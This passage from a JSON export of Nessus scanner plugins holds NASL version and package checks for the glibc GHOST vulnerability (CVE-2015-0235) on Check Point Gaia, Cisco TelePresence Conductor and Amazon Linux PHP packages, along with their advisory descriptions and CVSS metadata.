script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n\n script_name(english:\"Check Point Gaia Operating Remote Heap Buffer Overflow (sk104443)(GHOST)\");\n script_summary(english:\"Checks the version of Gaia OS.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is missing a vendor-supplied security patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Gaia OS which is affected by\na heap buffer overflow vulnerability in glibc which could potentially\nallow an attacker execute arbitrary code in the context of the user\nrunning the affected application.\");\n # https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk104443&partition=General&product=Security\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ba5b918a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update to an unaffected version or apply vendor-supplied hotfix.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-0235\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:check_point:gaia_os\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Firewalls\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"check_point_gaia_os_version.nbin\");\n script_require_keys(\"Host/Check_Point/version\", \"Host/Check_Point/installed_hotfixes\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\napp_name = \"Gaia Operating System\";\nversion = get_kb_item_or_exit(\"Host/Check_Point/version\");\nhfs = get_kb_item_or_exit(\"Host/Check_Point/installed_hotfixes\");\nvuln = FALSE;\n\nif (version =~ \"R7[01]\")\n{\n vuln = TRUE;\n fix = \"Upgrade to an unaffected version or contact Checkpoint support.\";\n}\nelse if (version =~ \"R75\\.4[0567]\" || version =~ \"R76\" || version =~ \"R77(\\.[12]0)?$\")\n{\n if(\"sk104443\" >!< hfs)\n vuln = TRUE;\n fix = \"Apply hotfix sk104443\";\n}\nelse\n audit(AUDIT_DEVICE_NOT_VULN, \"The remote device running \" + app_name + \" (version \" + version + \")\");\n\nif(vuln)\n{\n report =\n '\\n Installed version : ' + version +\n '\\n Fix : ' + fix +\n '\\n';\n security_report_v4(port:0, severity:SECURITY_HOLE, extra:report);\n}\nelse audit(AUDIT_DEVICE_NOT_VULN, \"The remote device running \" + app_name + \" (version \" + version + \")\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:49:22", "description": "According to its self-reported version number, the Cisco TelePresence Conductor remote device is affected by a heap-based buffer overflow vulnerability in the GNU C Library (glibc) due to improperly validating user-supplied input to the __nss_hostname_digits_dots(), gethostbyname(), and gethostbyname2() functions. This allows a remote attacker to cause a buffer overflow, resulting in a denial of service condition or the execution of arbitrary code.", "cvss3": {}, "published": "2015-02-18T00:00:00", "type": "nessus", "title": "Cisco TelePresence Conductor GNU glibc gethostbyname Function Buffer Overflow Vulnerability (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:cisco:telepresence_conductor"], "id": "CISCO_TELEPRESENCE_CONDUCTOR_CSCUS69523.NASL", "href": "https://www.tenable.com/plugins/nessus/81407", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81407);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_bugtraq_id(72325);\n script_xref(name:\"CERT\", value:\"967332\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCus69523\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20150128-ghost\");\n\n script_name(english:\"Cisco TelePresence Conductor GNU glibc gethostbyname Function Buffer Overflow Vulnerability (GHOST)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Cisco TelePresence Conductor device is affected by a buffer\noverflow vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Cisco TelePresence\nConductor remote device is affected by a heap-based buffer overflow\nvulnerability in the GNU C Library (glibc) due to improperly\nvalidating user-supplied input to the __nss_hostname_digits_dots(),\ngethostbyname(), and gethostbyname2() functions. This allows a remote\nattacker to cause a buffer overflow, resulting in a denial of service\ncondition or the execution of arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://tools.cisco.com/bugsearch/bug/CSCus69523\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20150128-ghost\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fd2144f8\");\n # https://www.qualys.com/research/security-advisories/GHOST-CVE-2015-0235.txt\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c7a6ddbd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to version 2.4 / 3.0 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/01/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/02/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:telepresence_conductor\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CISCO\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"cisco_telepresence_conductor_detect.nbin\");\n script_require_keys(\"Host/Cisco_TelePresence_Conductor/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nprod = \"Cisco TelePresence Conductor\";\nversion = get_kb_item_or_exit(\"Host/Cisco_TelePresence_Conductor/Version\");\n\nif (\n version =~ \"^1(\\.|$)\" ||\n (version =~ \"^2\\.[0-3](\\.|$)\")\n)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Installed version : ' + version +\n '\\n Fixed versions : 2.4 / 3.0' +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, prod, version);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:52:02", "description": "A heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nUse after free vulnerability was reported in PHP DateTimeZone.\n(CVE-2015-0273)", "cvss3": {}, "published": "2015-03-17T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : php54 (ALAS-2015-493) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235", "CVE-2015-0273"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:php54", "p-cpe:/a:amazon:linux:php54-bcmath", "p-cpe:/a:amazon:linux:php54-cli", "p-cpe:/a:amazon:linux:php54-common", "p-cpe:/a:amazon:linux:php54-dba", "p-cpe:/a:amazon:linux:php54-debuginfo", "p-cpe:/a:amazon:linux:php54-devel", "p-cpe:/a:amazon:linux:php54-embedded", "p-cpe:/a:amazon:linux:php54-enchant", "p-cpe:/a:amazon:linux:php54-fpm", "p-cpe:/a:amazon:linux:php54-gd", "p-cpe:/a:amazon:linux:php54-imap", "p-cpe:/a:amazon:linux:php54-intl", "p-cpe:/a:amazon:linux:php54-ldap", "p-cpe:/a:amazon:linux:php54-mbstring", "p-cpe:/a:amazon:linux:php54-mcrypt", "p-cpe:/a:amazon:linux:php54-mssql", "p-cpe:/a:amazon:linux:php54-mysql", "p-cpe:/a:amazon:linux:php54-mysqlnd", "p-cpe:/a:amazon:linux:php54-odbc", "p-cpe:/a:amazon:linux:php54-pdo", "p-cpe:/a:amazon:linux:php54-pgsql", "p-cpe:/a:amazon:linux:php54-process", "p-cpe:/a:amazon:linux:php54-pspell", "p-cpe:/a:amazon:linux:php54-recode", "p-cpe:/a:amazon:linux:php54-snmp", "p-cpe:/a:amazon:linux:php54-soap", "p-cpe:/a:amazon:linux:php54-tidy", "p-cpe:/a:amazon:linux:php54-xml", "p-cpe:/a:amazon:linux:php54-xmlrpc", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2015-493.NASL", "href": "https://www.tenable.com/plugins/nessus/81829", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2015-493.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81829);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2015-0235\", \"CVE-2015-0273\");\n script_xref(name:\"ALAS\", value:\"2015-493\");\n\n script_name(english:\"Amazon Linux AMI : php54 (ALAS-2015-493) (GHOST)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nUse after free vulnerability was reported in PHP DateTimeZone.\n(CVE-2015-0273)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2015-493.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update php54' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-mysqlnd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php54-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/13\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/17\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 Tenable Network Security, Inc.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"php54-5.4.38-1.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-bcmath-5.4.38-1.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-cli-5.4.38-1.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-common-5.4.38-1.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-dba-5.4.38-1.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-debuginfo-5.4.38-1.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-devel-5.4.38-1.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-embedded-5.4.38-1.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-enchant-5.4.38-1.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-fpm-5.4.38-1.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-gd-5.4.38-1.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-imap-5.4.38-1.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-intl-5.4.38-1.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-ldap-5.4.38-1.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-mbstring-5.4.38-1.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-mcrypt-5.4.38-1.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-mssql-5.4.38-1.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-mysql-5.4.38-1.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-mysqlnd-5.4.38-1.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-odbc-5.4.38-1.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-pdo-5.4.38-1.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-pgsql-5.4.38-1.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-process-5.4.38-1.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-pspell-5.4.38-1.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-recode-5.4.38-1.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-snmp-5.4.38-1.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-soap-5.4.38-1.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-tidy-5.4.38-1.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-xml-5.4.38-1.66.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"php54-xmlrpc-5.4.38-1.66.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php54 / php54-bcmath / php54-cli / php54-common / php54-dba / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:52:33", "description": "A heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nA use-after-free flaw was found in the unserialize() function of PHP's DateTimeZone implementation. A malicious script author could possibly use this flaw to disclose certain portions of server memory.\n(CVE-2015-0273)", "cvss3": {}, "published": "2015-03-25T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : php55 (ALAS-2015-494) (GHOST)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-0235", "CVE-2015-0273"], "modified": "2018-04-18T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:php55", "p-cpe:/a:amazon:linux:php55-bcmath", "p-cpe:/a:amazon:linux:php55-cli", "p-cpe:/a:amazon:linux:php55-common", "p-cpe:/a:amazon:linux:php55-dba", "p-cpe:/a:amazon:linux:php55-debuginfo", "p-cpe:/a:amazon:linux:php55-devel", "p-cpe:/a:amazon:linux:php55-embedded", "p-cpe:/a:amazon:linux:php55-enchant", "p-cpe:/a:amazon:linux:php55-fpm", "p-cpe:/a:amazon:linux:php55-gd", "p-cpe:/a:amazon:linux:php55-gmp", "p-cpe:/a:amazon:linux:php55-imap", "p-cpe:/a:amazon:linux:php55-intl", "p-cpe:/a:amazon:linux:php55-ldap", "p-cpe:/a:amazon:linux:php55-mbstring", "p-cpe:/a:amazon:linux:php55-mcrypt", "p-cpe:/a:amazon:linux:php55-mssql", "p-cpe:/a:amazon:linux:php55-mysqlnd", "p-cpe:/a:amazon:linux:php55-odbc", "p-cpe:/a:amazon:linux:php55-opcache", "p-cpe:/a:amazon:linux:php55-pdo", "p-cpe:/a:amazon:linux:php55-pgsql", "p-cpe:/a:amazon:linux:php55-process", "p-cpe:/a:amazon:linux:php55-pspell", "p-cpe:/a:amazon:linux:php55-recode", "p-cpe:/a:amazon:linux:php55-snmp", "p-cpe:/a:amazon:linux:php55-soap", "p-cpe:/a:amazon:linux:php55-tidy", "p-cpe:/a:amazon:linux:php55-xml", "p-cpe:/a:amazon:linux:php55-xmlrpc", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2015-494.NASL", "href": "https://www.tenable.com/plugins/nessus/82043", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2015-494.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(82043);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/04/18 15:09:35\");\n\n script_cve_id(\"CVE-2015-0235\", \"CVE-2015-0273\");\n script_xref(name:\"ALAS\", value:\"2015-494\");\n\n script_name(english:\"Amazon Linux AMI : php55 (ALAS-2015-494) (GHOST)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nA use-after-free flaw was found in the unserialize() function of PHP's\nDateTimeZone implementation. A malicious script author could possibly\nuse this flaw to disclose certain portions of server memory.\n(CVE-2015-0273)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2015-494.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update php55' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-imap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-mssql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-mysqlnd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-opcache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-process\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-recode\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-tidy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-xml\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:php55-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/23\");\n script_set_attribute(attribute:\"in_the_news\", 